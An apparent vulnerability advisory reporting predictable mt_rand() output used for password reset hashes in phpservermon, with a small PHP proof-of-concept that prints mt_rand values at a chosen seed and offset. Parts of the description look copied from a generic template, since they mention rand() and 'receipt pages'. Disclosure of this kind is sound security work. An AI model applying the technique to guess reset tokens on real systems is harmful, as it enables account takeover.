Use of Predictable Algorithm in Random Number Generator in phpservermon/phpservermon
Reported on
Jun 23rd 2021
βοΈ Description
The random number generator implemented by mt_rand()
cannot withstand a cryptographic attack. Insecure randomness errors occur when a function that can produce predictable values is used as a source of randomness in security-sensitive context.
In this case the function that generates weak random numbers is mt_rand()
in /psm/Service/User.php
at line 394
.
This code uses the rand() function to generate "unique" identifiers for the receipt pages it generates. Because rand() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG.
π΅οΈββοΈ Proof of Concept
**POC.php**
#!/usr/bin/env php
<?php
if($argc < 3)
{
print($argv[0] . ' <seed> <n>' . "\n");
print('' . "\n");
print('Parameters:' . "\n");
print(' seed: Seed to initialize mt_rand() with' . "\n");
print(' offset: Number of calls to mt_rand() before printing the first');
print(' output' . "\n");
print('' . "\n");
print('Output:' . "\n");
print(' <offset>\'s call to mt_rand() and <offset+227>\'s call');
print(' to mt_rand()' . "\n");
exit();
}
mt_srand($argv[1]);
for($i=0;$i<$argv[2];$i++)
mt_rand();
print mt_rand() . " ";
for($i=0;$i<226;$i++)
mt_rand();
print mt_rand() . "\n";
π₯ Impact
By exploiting this vulnerability, an attacker will able to produce or guess the reset password hashes of any user.
π΅οΈββοΈ Solution
When unpredictability is critical, as is the case with most security-sensitive uses of randomness, use a cryptographic PRNG. Regardless of the PRNG you choose, always use a value with sufficient entropy to seed the algorithm. (Values such as the current time offer only negligible entropy and should not be used.)
Occurrences
References
Thank you for finding π ! There are no reporters from users that this vulnerability has been used. Fixing it before someone does use it.